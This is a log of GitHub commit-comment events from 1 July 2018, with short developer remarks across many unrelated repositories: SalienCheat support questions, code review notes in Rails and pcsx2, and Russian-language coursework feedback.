{"id":"7902806100","type":"CommitCommentEvent","actor":{"login":"Corbian"},"repo":{"name":"SteamDatabase/SalienCheat"},"payload":{"comment":{"id":29557420,"position":null,"line":null,"path":null,"commit_id":"b3d597a2005feddcbb526e56ae0591fa2ada0a61","created_at":"2018-07-01T10:28:42Z","updated_at":"2018-07-01T10:28:42Z","author_association":"CONTRIBUTOR","body":"A new planet ?\r\n\r\n>> Planet 508 - Captured:  3.98% - High: 76 - Medium:  7 - Low: 13 - Saliens:  49,868 (Fighting Planet II)\r\n>> Planet  42 - Captured: 75.38% - High:  0 - Medium:  0 - Low: 33 - Saliens:  76,019 (Cyberpunk Planet II)\r\n>> Planet  41 - Captured: 43.89% - High:  0 - Medium:  0 - Low: 63 - Saliens: 127,466 (Take it Easy Planet II)\r\n>> Planet  40 - Captured: 87.14% - High:  0 - Medium:  0 - Low: 20 - Saliens: 115,544 (Memes Planet)\r\n>> Planet  39 - Captured: 79.11% - High:  0 - Medium:  0 - Low: 28 - Saliens: 131,717 (Planet of Jumpless Platformers)\r\n\r\nNumbering is different there : https://wtzb.github.io/SalienProgress/\r\nIt started to show as '508' right after noon (not linked to any script modification nor restart)"}},"created_at":"2018-07-01T10:28:42Z"}
{"id":"7902806111","type":"CommitCommentEvent","actor":{"login":"kuanlbangar"},"repo":{"name":"kuanlbangar/Group"},"payload":{"comment":{"id":29557421,"position":null,"line":null,"path":null,"commit_id":"6132157f1f486a60069d71c20b879a457c37fcbc","created_at":"2018-07-01T10:28:42Z","updated_at":"2018-07-01T10:28:42Z","author_association":"OWNER","body":"Reviewed by Kunal Bangar"}},"created_at":"2018-07-01T10:28:42Z"}
{"id":"7902807076","type":"CommitCommentEvent","actor":{"login":"stellingsimon"},"repo":{"name":"ical4j/ical4j"},"payload":{"comment":{"id":29557423,"position":26,"line":280,"path":"src/main/java/net/fortuna/ical4j/model/TimeZoneLoader.java","commit_id":"8917af2a7bdabd0ed70980984ba39f29e554baff","created_at":"2018-07-01T10:29:26Z","updated_at":"2018-07-01T10:29:26Z","author_association":"NONE","body":"Users that have a different timezone cache configured will not run into any issues anymore. However, if I read correctly (I didn't test), a user with the default configuration but without JCache on the classpath would still get an exception, and he might not realize why... Especially if JCache *was* on the classpath before due to a different third-party lib. Relying on an *optional* dependency *by default* is probably somewhat unexpected. A RuntimeException message with instructions on how to remedy the situation may help reduce the number of issues you'll get from first time users. \r\n\r\n- - > Something like \"You're using a default cache implementation based on JCache, but don't have JCache on the classpath; either set a different cache implementation via conf key net.fortuna.... or depend on jcache-x.y explicitly\". "}},"created_at":"2018-07-01T10:29:26Z"}
{"id":"7902807919","type":"CommitCommentEvent","actor":{"login":"Kaixhin"},"repo":{"name":"Kaixhin/ACER"},"payload":{"comment":{"id":29557426,"position":null,"line":null,"path":null,"commit_id":"4326295297ad7c4c7accf6ffaae707432d4c6f0e","created_at":"2018-07-01T10:30:04Z","updated_at":"2018-07-01T10:30:04Z","author_association":"OWNER","body":"I haven't run MountainCar before."}},"created_at":"2018-07-01T10:30:04Z"}
{"id":"7902809731","type":"CommitCommentEvent","actor":{"login":"xlei1234"},"repo":{"name":"xlei1234/hello-world"},"payload":{"comment":{"id":29557431,"position":null,"line":null,"path":null,"commit_id":"cfe96e752c6bd94badab16c79b1149a21f7b9784","created_at":"2018-07-01T10:31:23Z","updated_at":"2018-07-01T10:31:23Z","author_association":"OWNER","body":"添加测试"}},"created_at":"2018-07-01T10:31:23Z"}
{"id":"7902810173","type":"CommitCommentEvent","actor":{"login":"frederic-mahe"},"repo":{"name":"frederic-mahe/vsearch-tests"},"payload":{"comment":{"id":29557433,"position":null,"line":null,"path":null,"commit_id":"04545f6ff20475694c9fd0e6e734e16d823111a9","created_at":"2018-07-01T10:31:44Z","updated_at":"2018-07-01T10:31:44Z","author_association":"OWNER","body":"Hi @torognes , could you please confirm that the behavior described in the above test is the expected one for that vsearch command (case is preserved, results are not all in uppercase). I still need to check how that plays with the `--relabel_hash` options."}},"created_at":"2018-07-01T10:31:44Z"}
{"id":"7902811931","type":"CommitCommentEvent","actor":{"login":"Kroc"},"repo":{"name":"Galleondragon/qb64"},"payload":{"comment":{"id":29557439,"position":null,"line":null,"path":null,"commit_id":"d911e3d01e47a9159492fe32b16729e4c53f31a7","created_at":"2018-07-01T10:33:15Z","updated_at":"2018-07-01T10:33:15Z","author_association":"NONE","body":"Thank you so much for adding this -- it solves an issue we had absolutely no control over, particularly as ALT+ENTER is universally known as a full-screen switch."}},"created_at":"2018-07-01T10:33:15Z"}
{"id":"7902813241","type":"CommitCommentEvent","actor":{"login":"csina99"},"repo":{"name":"chanfavor/microbootzuul"},"payload":{"comment":{"id":29557440,"position":null,"line":null,"path":null,"commit_id":"f0ef4f7888e1dbeb6b9e5c2f7839bfa531a137ef","created_at":"2018-07-01T10:34:18Z","updated_at":"2018-07-01T10:34:18Z","author_association":"CONTRIBUTOR","body":"https://blog.csdn.net/forezp/article/details/70148833"}},"created_at":"2018-07-01T10:34:18Z"}
{"id":"7902813284","type":"CommitCommentEvent","actor":{"login":"jakey1995abc"},"repo":{"name":"SteamDatabase/SalienCheat"},"payload":{"comment":{"id":29557441,"position":null,"line":null,"path":null,"commit_id":"b3d597a2005feddcbb526e56ae0591fa2ada0a61","created_at":"2018-07-01T10:34:20Z","updated_at":"2018-07-01T10:34:20Z","author_association":"NONE","body":"For about 5 days now your script will randomly just stop for no reason after a few hours of running, is this normal? I keep leaving it to run over night and I will wake up to find that it has froze sometime around midnight. I have been updating the script constantly, yet it still keeps happening."}},"created_at":"2018-07-01T10:34:20Z"}
{"id":"7902813454","type":"CommitCommentEvent","actor":{"login":"SupNacho"},"repo":{"name":"qervot/mark-my-word"},"payload":{"comment":{"id":29557442,"position":18,"line":46,"path":"app/src/main/java/me/geeksploit/markmyword/model/WordModel.java","commit_id":"e9a83b8e70d2e73c17cdf731338f2a56a534bf25","created_at":"2018-07-01T10:34:28Z","updated_at":"2018-07-01T10:34:28Z","author_association":"NONE","body":"Ильяс, привет.\r\nТебе удалось выдать доступ преподавателю, чтоб он упорядочил твои ветки?\r\nЕсли у тебя какие то сложности с этим, напиши в телеграмм.\r\nПо шагам буду тебе говорить как дать доступ или подключусь по teamviewer-у и выдам сам, а ты посмотришь как это делается.\r\n\r\nПо факту слитых веток и оформленного pull-request-а будем смотреть что там к чему. Сравнивать просто визуально построчно нереально.\r\nПиши в телегу, что получится сделать и чем помочь."}},"created_at":"2018-07-01T10:34:28Z"}
{"id":"7902813909","type":"CommitCommentEvent","actor":{"login":"xPaw"},"repo":{"name":"SteamDatabase/SalienCheat"},"payload":{"comment":{"id":29557443,"position":null,"line":null,"path":null,"commit_id":"b3d597a2005feddcbb526e56ae0591fa2ada0a61","created_at":"2018-07-01T10:34:52Z","updated_at":"2018-07-01T10:34:52Z","author_association":"MEMBER","body":"Sounds like a problem on your end."}},"created_at":"2018-07-01T10:34:52Z"}
{"id":"7902814795","type":"CommitCommentEvent","actor":{"login":"gilbertohasnofb"},"repo":{"name":"c172p-team/c172p"},"payload":{"comment":{"id":29557444,"position":null,"line":null,"path":null,"commit_id":"3ae6a0940f6a98a48b828f77d96de939f5ddaf84","created_at":"2018-07-01T10:35:32Z","updated_at":"2018-07-01T10:35:32Z","author_association":"COLLABORATOR","body":"@it0uchpods I don't think the gauges look bad at all. What exactly do you think should be improved? Textures? 3D Model?"}},"created_at":"2018-07-01T10:35:32Z"}
{"id":"7902814841","type":"CommitCommentEvent","actor":{"login":"AngelinaHuang"},"repo":{"name":"AngelinaHuang/ARTS"},"payload":{"comment":{"id":29557445,"position":15,"line":28,"path":"2018-07-01-ARTS-Week1.md","commit_id":"515fc073476764ed12d244987f9eefc89547fa05","created_at":"2018-07-01T10:35:34Z","updated_at":"2018-07-01T10:35:34Z","author_association":"OWNER","body":"`class Solution{\r\n\tpublic int[] twoSum(int[] nums,int target){\r\n\t\tfor(int i=0;i<nums.length;i++){\r\n\t\t\tfor(int j=i+1;i<nums.length;j++){\r\n\t\t\t\tif(nums[j]==target-nums[i]){\r\n\t\t\t\t\treturn new int[]{i,j};\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t\tthrow new IllegalArgumentException(\"there is no solution\");\r\n\t}\r\n}\r\n`"}},"created_at":"2018-07-01T10:35:34Z"}
{"id":"7902818581","type":"CommitCommentEvent","actor":{"login":"davidbgk"},"repo":{"name":"betagouv/zam"},"payload":{"comment":{"id":29557452,"position":19,"line":39,"path":"repondeur/zam_repondeur/views/reponse.py","commit_id":"50a51d12a55474e632453a02df6ff20c3ff73beb","created_at":"2018-07-01T10:38:31Z","updated_at":"2018-07-01T10:38:31Z","author_association":"MEMBER","body":"> Any method that converts that to a number should work for that.\r\n\r\nAgreed, I anticipated a bit the fact that we probably will need to display the date whatsoever in JS and at that time using `new Date(timestamp * 1000)` will allow us to be timezone-aware for free and then convert to *browser* local time more easily but other strategies are possible."}},"created_at":"2018-07-01T10:38:31Z"}
{"id":"7902822379","type":"CommitCommentEvent","actor":{"login":"akaAMAZING"},"repo":{"name":"Kooku/poe_currency_maker"},"payload":{"comment":{"id":29557454,"position":null,"line":null,"path":null,"commit_id":"4c080752a509c47e87875bb707b300c136c87358","created_at":"2018-07-01T10:41:34Z","updated_at":"2018-07-01T10:41:34Z","author_association":"NONE","body":"Is this still working bud? Trying all sorts to get it to function but getting nothing."}},"created_at":"2018-07-01T10:41:34Z"}
{"id":"7902822473","type":"CommitCommentEvent","actor":{"login":"mehulshahnj"},"repo":{"name":"mehulshahnj/gc-blockchain-app"},"payload":{"comment":{"id":29557455,"position":null,"line":null,"path":null,"commit_id":"dcce0770dc85916715a7ef781e81363fc83cde34","created_at":"2018-07-01T10:41:38Z","updated_at":"2018-07-01T10:41:38Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/3955c280-8a6e-4ed0-b7a5-6f30f95f589d?env_id=ibm%3Ayp%3Aus-south \"gc-blockchain-app\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/90d723e9-1ac3-490d-b08c-83526e6ac856?env_id=ibm%3Ayp%3Aus-south \"gc-blockchain-app\") deployed [gc-blockchain-app](https://github.com/mehulshahnj/gc-blockchain-app/releases/tag/deploy-ibm-yp-us-south-mehul-infinity-services.com-dev-20180701-104137 \"deploy-ibm-yp-us-south-mehul-infinity-services.com-dev-20180701-104137\") to [dev](https://console.bluemix.net/apps/b9ead3c1-6962-4520-809a-87f5c3f4c6b0?env_id=ibm:yp:us-south \"ibm:yp:us-south:mehul@infinity-services.com:dev\"), including this commit"}},"created_at":"2018-07-01T10:41:38Z"}
{"id":"7902823304","type":"CommitCommentEvent","actor":{"login":"Henry2o1o"},"repo":{"name":"berlinux2016/MIUI10"},"payload":{"comment":{"id":29557457,"position":null,"line":null,"path":null,"commit_id":"2b364271ce2f1d5418402da0d8c5bbd213267423","created_at":"2018-07-01T10:42:18Z","updated_at":"2018-07-01T10:42:18Z","author_association":"COLLABORATOR","body":"WLAN 2.4 G/2.5 G\n\nWie man das schreibt weiß ich schon."}},"created_at":"2018-07-01T10:42:18Z"}
{"id":"7902824317","type":"CommitCommentEvent","actor":{"login":"Arias800"},"repo":{"name":"Kodi-vStream/venom-xbmc-addons"},"payload":{"comment":{"id":29557460,"position":null,"line":null,"path":null,"commit_id":"2c1c5831fe18caed34a19abef1d9e0ccf540c667","created_at":"2018-07-01T10:43:06Z","updated_at":"2018-07-01T10:43:06Z","author_association":"CONTRIBUTOR","body":"Voila c'est fait du coup j'ai pas eu besoin de xbmc et j'ai enlever d'autre import non utiliser ^^"}},"created_at":"2018-07-01T10:43:06Z"}
{"id":"7902825344","type":"CommitCommentEvent","actor":{"login":"K2177"},"repo":{"name":"SteamDatabase/SalienCheat"},"payload":{"comment":{"id":29557464,"position":null,"line":null,"path":null,"commit_id":"b3d597a2005feddcbb526e56ae0591fa2ada0a61","created_at":"2018-07-01T10:43:51Z","updated_at":"2018-07-01T10:43:51Z","author_association":"NONE","body":"@jakey1995abc Disable Quick Edit mode from commandline properties."}},"created_at":"2018-07-01T10:43:51Z"}
{"id":"7902827542","type":"CommitCommentEvent","actor":{"login":"minarii"},"repo":{"name":"SteamDatabase/SalienCheat"},"payload":{"comment":{"id":29557468,"position":null,"line":null,"path":null,"commit_id":"b3d597a2005feddcbb526e56ae0591fa2ada0a61","created_at":"2018-07-01T10:45:31Z","updated_at":"2018-07-01T10:45:31Z","author_association":"NONE","body":"Can confirm, had this script on PC, Heroku, my android phone (everthing for more than 48 hours), didn't bother updating too often yet it always worked. Try using a different device or set it up clean again."}},"created_at":"2018-07-01T10:45:31Z"}
{"id":"7902830017","type":"CommitCommentEvent","actor":{"login":"yanhaishixian"},"repo":{"name":"Moonshile/ChineseWordSegmentation"},"payload":{"comment":{"id":29557470,"position":null,"line":null,"path":null,"commit_id":"2cd3373da08fcdeb7e0f6b6a009bdfda4dd5c052","created_at":"2018-07-01T10:47:26Z","updated_at":"2018-07-01T10:47:26Z","author_association":"NONE","body":"When installing the package,I encountered the following error:\r\ncould not find a version that satisfies the requirement setup.py \r\n\r\nDoesn't it fit python3.5?"}},"created_at":"2018-07-01T10:47:26Z"}
{"id":"7902830410","type":"CommitCommentEvent","actor":{"login":"DenF2412"},"repo":{"name":"KaiL4eK/tigra_project"},"payload":{"comment":{"id":29557471,"position":72,"line":72,"path":"controller_driver/src/steer_unit_cs.c","commit_id":"6f201b79028c4833c9bcd5093dfeb351ed310e37","created_at":"2018-07-01T10:47:49Z","updated_at":"2018-07-01T10:47:49Z","author_association":"NONE","body":"Думаю, что здесь лучше сделать <="}},"created_at":"2018-07-01T10:47:49Z"}
{"id":"7902830648","type":"CommitCommentEvent","actor":{"login":"ZirconiumX"},"repo":{"name":"audiohacked/ckb-next"},"payload":{"comment":{"id":29557472,"position":null,"line":null,"path":null,"commit_id":"727c6dbb9bf0bb2b1a3a719348148903f3cc0e5a","created_at":"2018-07-01T10:48:02Z","updated_at":"2018-07-01T10:48:02Z","author_association":"NONE","body":"Send us a pull request; I'll be happy to merge this in!"}},"created_at":"2018-07-01T10:48:02Z"}
{"id":"7902830991","type":"CommitCommentEvent","actor":{"login":"Zhikh"},"repo":{"name":"Zhikh/NET.S.2018.Zhikh.02"},"payload":{"comment":{"id":29557473,"position":19,"line":31,"path":"NET.S.2018.Zhikh.02/Logic.Task2/DigitWorker.cs","commit_id":"30d420aa4e1762d9d9feabe9cb4723d4a4332f8b","created_at":"2018-07-01T10:48:19Z","updated_at":"2018-07-01T10:48:19Z","author_association":"OWNER","body":"1. checkString - лишний, уберу\r\n2. Реализацию через строки и через деление можно выложить для LINQPad? Или будет лучше добавить дополнительный метод?\r\n3. Рекурсию переделаю\r\n\r\nСпасибо"}},"created_at":"2018-07-01T10:48:19Z"}
{"id":"7902831267","type":"CommitCommentEvent","actor":{"login":"kaspth"},"repo":{"name":"rails/rails"},"payload":{"comment":{"id":29557475,"position":9,"line":9,"path":"activesupport/CHANGELOG.md","commit_id":"969577d960cd7e2d0a421af4a987f56894c3b229","created_at":"2018-07-01T10:48:35Z","updated_at":"2018-07-01T10:48:35Z","author_association":"MEMBER","body":"@huacnlee I couldn't understand your original changelog entry, so I tried to rewrite it. Does this still capture what you meant?\r\n\r\nThanks for the feature!"}},"created_at":"2018-07-01T10:48:35Z"}
{"id":"7902832310","type":"CommitCommentEvent","actor":{"login":"wildye"},"repo":{"name":"fengcms/vue-demo-cnodejs"},"payload":{"comment":{"id":29557479,"position":null,"line":null,"path":null,"commit_id":"4bd42e04960b52d9b831b3e2947d3ac7b00ddef2","created_at":"2018-07-01T10:49:28Z","updated_at":"2018-07-01T10:49:28Z","author_association":"NONE","body":"有个问题，我在 style.scss 中定义了一个变量 $base-color，已经在 App.vue 中引入\r\n```\r\n<style lang=\"scss\">\r\n@import \"./style/style\";\r\n#app {\r\n  color: $base-color: blue;\r\n}\r\n</style>\r\n```\r\n但是在子组件页面中引入该变量却报错 未定义"}},"created_at":"2018-07-01T10:49:28Z"}
{"id":"7902832762","type":"CommitCommentEvent","actor":{"login":"Traesh"},"repo":{"name":"AshamaneProject/AshamaneCore"},"payload":{"comment":{"id":29557481,"position":5,"line":852,"path":"src/server/game/Entities/Pet/Pet.cpp","commit_id":"7a006adadf1dc77e2ec7ec10b0ba1b5e9ce7988c","created_at":"2018-07-01T10:49:51Z","updated_at":"2018-07-01T10:49:51Z","author_association":"NONE","body":"https://media.giphy.com/media/sirYaPWyjCvEk/giphy.gif"}},"created_at":"2018-07-01T10:49:51Z"}
{"id":"7902833713","type":"CommitCommentEvent","actor":{"login":"Zhikh"},"repo":{"name":"Zhikh/NET.S.2018.Zhikh.02"},"payload":{"comment":{"id":29557483,"position":null,"line":null,"path":null,"commit_id":"aba2b3e4bcdc2c8e975ac43c4cdce65802a52392","created_at":"2018-07-01T10:50:37Z","updated_at":"2018-07-01T10:50:37Z","author_association":"OWNER","body":"Я хотела избежать большой вложенности. Посмотрю, что можно переделать. Спасибо."}},"created_at":"2018-07-01T10:50:37Z"}
{"id":"7902835906","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"MaxArt1405/ASP.NET-Training"},"payload":{"comment":{"id":29557484,"position":null,"line":null,"path":null,"commit_id":"153fda2dd02cfbdac1635d6bdafffc339fbbe67c","created_at":"2018-07-01T10:52:30Z","updated_at":"2018-07-01T10:52:30Z","author_association":"NONE","body":"Почти. Последнее замечание - название тестового класса, для него есть вполне определеная рекомендация.\n\n\n\n\n________________________________\n\n\nBest regards, Anzhelika Kravchuk.\n\n\n\n\n\n\n\nOn Sun, Jul 1, 2018 at 12:06 PM +0300, \"MaxArt1405\" <notifications@github.com> wrote:\n\n\n\n\n\n\n\n\n\n\nПолучается надо в сортировках надо добавить описание на exception, вернуть\n\n\nмассив если длина 1, и exception если 0\n\n\nВ задании 2 про filter изменить название класса, так?\n\n\n\n\n\n1 июля 2018 г., 11:29 пользователь Anzhelika Kravchuk <\n\n\nnotifications@github.com> написал:\n\n\n\n\n\n> В целом все выглядит очень хорошо, только переименуйте файл, содержащий\n\n\n> тестовый класс (UnitTest1 - это плохо )\n\n\n>\n\n\n> —\n\n\n> You are receiving this because you authored the thread.\n\n\n> Reply to this email directly, view it on GitHub\n\n\n> <https://github.com/MaxArt1405/ASP.NET-Training/commit/153fda2dd02cfbdac1635d6bdafffc339fbbe67c#commitcomment-29557050>,\n\n\n> or mute the thread\n\n\n> <https://github.com/notifications/unsubscribe-auth/AZXjjsimosciVSEsfhc5V-4wXPXHLqFFks5uCIhagaJpZM4U-Ptj>\n\n\n> .\n\n\n>\n\n\n\n\n\n\n—\nYou are receiving this because you commented.\nReply to this email directly, view it on GitHub, or mute the thread.\n\n\n\n\n\n\n"}},"created_at":"2018-07-01T10:52:30Z"}
{"id":"7902836698","type":"CommitCommentEvent","actor":{"login":"caouecs"},"repo":{"name":"caouecs/Laravel-lang"},"payload":{"comment":{"id":29557485,"position":null,"line":null,"path":null,"commit_id":"e569ff65b0e87cac01ff2fbbb3904de6bee79490","created_at":"2018-07-01T10:53:15Z","updated_at":"2018-07-01T10:53:15Z","author_association":"OWNER","body":"No, the json files are in lang directories ;)"}},"created_at":"2018-07-01T10:53:15Z"}
{"id":"7902837468","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"Zhikh/NET.S.2018.Zhikh.02"},"payload":{"comment":{"id":29557487,"position":19,"line":31,"path":"NET.S.2018.Zhikh.02/Logic.Task2/DigitWorker.cs","commit_id":"30d420aa4e1762d9d9feabe9cb4723d4a4332f8b","created_at":"2018-07-01T10:53:59Z","updated_at":"2018-07-01T10:53:59Z","author_association":"NONE","body":"Будет хорошо, если фильтр будет в двух вариантах в классе, для обоих вариантов  для больших данных тесты с выводом в debug  результатов счёты (с помощью stopwatch).\n\n\n\n\n________________________________\n\n\nBest regards, Anzhelika Kravchuk.\n\n\n\n\n\n\n\nOn Sun, Jul 1, 2018 at 1:48 PM +0300, \"Domino\" <notifications@github.com> wrote:\n\n\n\n\n\n\n\n\n\n\n\ncheckString - лишний, уберу\nРеализацию через строки и через деление можно выложить для LINQPad? Или будет лучше добавить дополнительный метод?\nРекурсию переделаю\n\n\n\nСпасибо\n\n\n\n—\nYou are receiving this because you commented.\nReply to this email directly, view it on GitHub, or mute the thread.\n\n\n\n\n\n\n"}},"created_at":"2018-07-01T10:53:59Z"}
{"id":"7902838168","type":"CommitCommentEvent","actor":{"login":"GX0730"},"repo":{"name":"GX0730/test"},"payload":{"comment":{"id":29557488,"position":10,"line":10,"path":"aa.html","commit_id":"e02254fadeab93c77bbd969c5c2888c689e72e2c","created_at":"2018-07-01T10:54:36Z","updated_at":"2018-07-01T10:54:36Z","author_association":"OWNER","body":"啥玩意\r\n"}},"created_at":"2018-07-01T10:54:36Z"}
{"id":"7902839514","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/r-circstats-feedstock"},"payload":{"comment":{"id":29557495,"position":null,"line":null,"path":null,"commit_id":"766e54dcff9df8a2b0796adeb60259ca482c4846","created_at":"2018-07-01T10:55:44Z","updated_at":"2018-07-01T10:55:44Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @jsignell were added to conda-forge. Welcome to conda-forge!\"\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @jsignell were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-01T10:55:44Z"}
{"id":"7902840026","type":"CommitCommentEvent","actor":{"login":"Zhikh"},"repo":{"name":"Zhikh/NET.S.2018.Zhikh.02"},"payload":{"comment":{"id":29557496,"position":19,"line":31,"path":"NET.S.2018.Zhikh.02/Logic.Task2/DigitWorker.cs","commit_id":"30d420aa4e1762d9d9feabe9cb4723d4a4332f8b","created_at":"2018-07-01T10:56:09Z","updated_at":"2018-07-01T10:56:09Z","author_association":"OWNER","body":"Хорошо, спасибо."}},"created_at":"2018-07-01T10:56:09Z"}
{"id":"7902840149","type":"CommitCommentEvent","actor":{"login":"dsh2dsh"},"repo":{"name":"KRodinn/OGSR-Engine"},"payload":{"comment":{"id":29557497,"position":null,"line":null,"path":null,"commit_id":"cf84c7300e0ea5114c765f34869b44e525375fa6","created_at":"2018-07-01T10:56:15Z","updated_at":"2018-07-01T10:56:15Z","author_association":"COLLABORATOR","body":"Судя по этому тесту, unordered_map явно быстрее. Значит в интернетах не врали.\r\n\r\nКто понимает, посмотрите мои изменения в shared_str, а то для меня это магия. Не наделал-ли я там каких граблей, на которые пока не наступил?"}},"created_at":"2018-07-01T10:56:15Z"}
{"id":"7902845578","type":"CommitCommentEvent","actor":{"login":"eadsrichai"},"repo":{"name":"eadsrichai/Test03"},"payload":{"comment":{"id":29557508,"position":null,"line":null,"path":null,"commit_id":"8b36da5de5a2fbe29788c0159547701213dbb9f0","created_at":"2018-07-01T11:00:51Z","updated_at":"2018-07-01T11:00:51Z","author_association":"OWNER","body":"fdafdfd"}},"created_at":"2018-07-01T11:00:51Z"}
{"id":"7902847911","type":"CommitCommentEvent","actor":{"login":"ssakash"},"repo":{"name":"PCSX2/pcsx2"},"payload":{"comment":{"id":29557512,"position":null,"line":null,"path":null,"commit_id":"1fefb4897e575dae0ffe31dd0e723aa01ea2493b","created_at":"2018-07-01T11:02:31Z","updated_at":"2018-07-01T11:02:31Z","author_association":"MEMBER","body":"If you're adding CRCs for demos, can you please add all of the demo CRCs in 1 commit instead of single one for each and every game?"}},"created_at":"2018-07-01T11:02:31Z"}
{"id":"7902848972","type":"CommitCommentEvent","actor":{"login":"tarun2917"},"repo":{"name":"tarun2917/SFDC-NIITKA"},"payload":{"comment":{"id":29557514,"position":null,"line":null,"path":null,"commit_id":"77889a0f4b75f7e63672cd3b21defceba389f130","created_at":"2018-07-01T11:03:21Z","updated_at":"2018-07-01T11:03:21Z","author_association":"OWNER","body":"okay testing is done"}},"created_at":"2018-07-01T11:03:21Z"}
{"id":"7902849294","type":"CommitCommentEvent","actor":{"login":"jakey1995abc"},"repo":{"name":"SteamDatabase/SalienCheat"},"payload":{"comment":{"id":29557515,"position":null,"line":null,"path":null,"commit_id":"b3d597a2005feddcbb526e56ae0591fa2ada0a61","created_at":"2018-07-01T11:03:38Z","updated_at":"2018-07-01T11:03:38Z","author_association":"NONE","body":"@K2177 Giving this a go now, if it fixes the issue I will respond back."}},"created_at":"2018-07-01T11:03:38Z"}
{"id":"7902850988","type":"CommitCommentEvent","actor":{"login":"reloxx13"},"repo":{"name":"arendst/Sonoff-Tasmota"},"payload":{"comment":{"id":29557516,"position":null,"line":null,"path":null,"commit_id":"20a53950ff208314cb609cb3ecf640c4bf5c4d85","created_at":"2018-07-01T11:05:07Z","updated_at":"2018-07-01T11:05:07Z","author_association":"NONE","body":"soo, for me they react better with this persitent option :S\r\n\r\nill let this in in my builds."}},"created_at":"2018-07-01T11:05:07Z"}
{"id":"7902852013","type":"CommitCommentEvent","actor":{"login":"nusenu"},"repo":{"name":"nusenu/ansible-relayor"},"payload":{"comment":{"id":29557518,"position":32,"line":78,"path":"templates/torrc","commit_id":"e79db1fca9ba2d316e6aa3f3d099332bb8d74d49","created_at":"2018-07-01T11:06:02Z","updated_at":"2018-07-01T11:06:02Z","author_association":"OWNER","body":"this bug (missing space after OutboundBindAddressExit) was avoidable if we had kitchen IPv6 test coverage #158"}},"created_at":"2018-07-01T11:06:02Z"}
{"id":"7902852683","type":"CommitCommentEvent","actor":{"login":"ssakash"},"repo":{"name":"PCSX2/pcsx2"},"payload":{"comment":{"id":29557520,"position":null,"line":null,"path":null,"commit_id":"1fefb4897e575dae0ffe31dd0e723aa01ea2493b","created_at":"2018-07-01T11:06:38Z","updated_at":"2018-07-01T11:06:38Z","author_association":"MEMBER","body":"1/ there is no real reason to split them\r\n2/ the latest commit change logs will be highlighted in build bot, I don't think anyone would be fond of seeing multiple builds just for random crc additions\r\n\r\nI'm not sure if I'm biased on this, I need more feedback regarding the management of new CRC additions. @turtleli @avih @refractionpcsx2 @gregory38"}},"created_at":"2018-07-01T11:06:38Z"}
{"id":"7902853737","type":"CommitCommentEvent","actor":{"login":"ebfe"},"repo":{"name":"void-linux/void-packages"},"payload":{"comment":{"id":29557521,"position":5,"line":7,"path":"srcpkgs/protobuf-c/template","commit_id":"e81fc4745ba3ae04300601ff61997b804298765d","created_at":"2018-07-01T11:07:33Z","updated_at":"2018-07-01T11:07:33Z","author_association":"CONTRIBUTOR","body":"euh? why not simply use -std=c++17?"}},"created_at":"2018-07-01T11:07:33Z"}
{"id":"7902854255","type":"CommitCommentEvent","actor":{"login":"huacnlee"},"repo":{"name":"rails/rails"},"payload":{"comment":{"id":29557523,"position":9,"line":9,"path":"activesupport/CHANGELOG.md","commit_id":"969577d960cd7e2d0a421af4a987f56894c3b229","created_at":"2018-07-01T11:08:04Z","updated_at":"2018-07-01T11:08:04Z","author_association":"CONTRIBUTOR","body":"Yes, correct."}},"created_at":"2018-07-01T11:08:04Z"}
{"id":"7902855432","type":"CommitCommentEvent","actor":{"login":"LeszekWrobel"},"repo":{"name":"LeszekWrobel/color_input"},"payload":{"comment":{"id":29557524,"position":null,"line":null,"path":null,"commit_id":"98ad4e5c5bf859274b666eb8d1a0516aa73ccb4f","created_at":"2018-07-01T11:09:04Z","updated_at":"2018-07-01T11:09:04Z","author_association":"OWNER","body":"dodaj proszę licencje"}},"created_at":"2018-07-01T11:09:04Z"}
{"id":"7902856886","type":"CommitCommentEvent","actor":{"login":"Henry2o1o"},"repo":{"name":"berlinux2016/MIUI10"},"payload":{"comment":{"id":29557525,"position":null,"line":null,"path":null,"commit_id":"2b364271ce2f1d5418402da0d8c5bbd213267423","created_at":"2018-07-01T11:10:15Z","updated_at":"2018-07-01T11:10:15Z","author_association":"COLLABORATOR","body":"Original Xiaomi Stable\r\n\r\n![photo_2018-07-01_13-05-50 2](https://user-images.githubusercontent.com/6131799/42133806-fdcce608-7d2f-11e8-9781-ce3d2dc3a040.jpg)\r\n![photo_2018-07-01_13-05-50 3](https://user-images.githubusercontent.com/6131799/42133807-fdec858a-7d2f-11e8-81d6-b3a6bb2e1df2.jpg)\r\n"}},"created_at":"2018-07-01T11:10:15Z"}
{"id":"7902857477","type":"CommitCommentEvent","actor":{"login":"jdickerson95"},"repo":{"name":"GarmanGroup/RADDOSE-3D"},"payload":{"comment":{"id":29557527,"position":null,"line":null,"path":null,"commit_id":"7d03b7bf399024f67a83db591666c85eac436967","created_at":"2018-07-01T11:10:44Z","updated_at":"2018-07-01T11:10:44Z","author_association":"MEMBER","body":"Absolutely as it should be now. However still need to be able to specify goniometer oritentation"}},"created_at":"2018-07-01T11:10:44Z"}
{"id":"7902857650","type":"CommitCommentEvent","actor":{"login":"qervot"},"repo":{"name":"qervot/mark-my-word"},"payload":{"comment":{"id":29557528,"position":18,"line":46,"path":"app/src/main/java/me/geeksploit/markmyword/model/WordModel.java","commit_id":"e9a83b8e70d2e73c17cdf731338f2a56a534bf25","created_at":"2018-07-01T11:10:52Z","updated_at":"2018-07-01T11:10:52Z","author_association":"OWNER","body":"Я отправил запрос,он пока не ответил.Да нужна будет помощь я просто сам уже там запутался как там в ветках искать"}},"created_at":"2018-07-01T11:10:52Z"}
